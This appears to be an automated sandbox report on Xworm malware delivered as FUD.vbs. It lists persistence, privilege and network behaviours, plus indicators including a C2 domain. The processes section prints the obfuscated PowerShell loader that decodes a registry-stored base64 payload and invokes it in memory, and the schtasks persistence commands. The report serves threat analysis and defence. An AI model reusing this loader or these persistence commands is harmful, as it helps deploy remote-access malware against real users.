Analysis Overview
SHA256
825d0918656842496be2186889202fd231c7f823f2a8f788e7a8a2f3b91e1c28
Threat Level: Known bad
The file FUD.vbs was found to be: Known bad.
Malicious Activity Summary
Xworm
Detect Xworm Payload
Command and Scripting Interpreter: PowerShell
Blocklisted process makes network request
Drops startup file
Adds Run key to start application
Looks up external IP address via web service
Enumerates physical storage devices
Scheduled Task/Job: Scheduled Task
Uses Task Scheduler COM API
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Delays execution with timeout.exe
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-06-21 20:40
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-06-21 20:40
Reported
2024-06-21 20:45
Platform
win11-20240611-en
Max time kernel
91s
Max time network
202s
Signatures
Detect Xworm Payload
Xworm
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pro hacker.vbs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows backup.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows backup.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pro hacker.vbs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2198854727-3842442895-2838824242-1000\Software\Microsoft\Windows\CurrentVersion\Run\Windows backup = "C:\\Users\\Admin\\Windows backup" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Enumerates physical storage devices
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\FUD.vbs"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit -exec bypass -window 1 -Command Copy-Item 'C:\Users\Admin\AppData\Local\Temp\FUD.vbs' 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pro hacker.vbs'; $impounding = ((Get-ItemProperty HKCU:\Software\Chrome\).Updates); $impounding = -join $impounding[-1..-$impounding.Length];[<##>AppDomain<##>]::<##>('nonconstructivenessurrentDomain'.replace('nonconstructiveness','C'))<##>.<##>('handhiddenoad'.replace('handhidden','L'))([Convert]::FromBase64String($impounding))<##>.<##>('dynamistsntryPoint'.replace('dynamists','E'))<##>.<##>('Inpandiedoke'.replace('pandied','v'))($Null,$Null)<##>;
C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Windows backup" /tr "C:\Users\Admin\Windows backup"
C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /delete /f /tn "Windows backup"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp55EB.tmp.bat""
C:\Windows\system32\timeout.exe
timeout 3
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | 1.112.95.208.in-addr.arpa | udp |
| US | 147.185.221.20:23695 | modern-educators.gl.at.ply.gg | tcp |
| US | 147.185.221.20:23695 | modern-educators.gl.at.ply.gg | tcp |
Files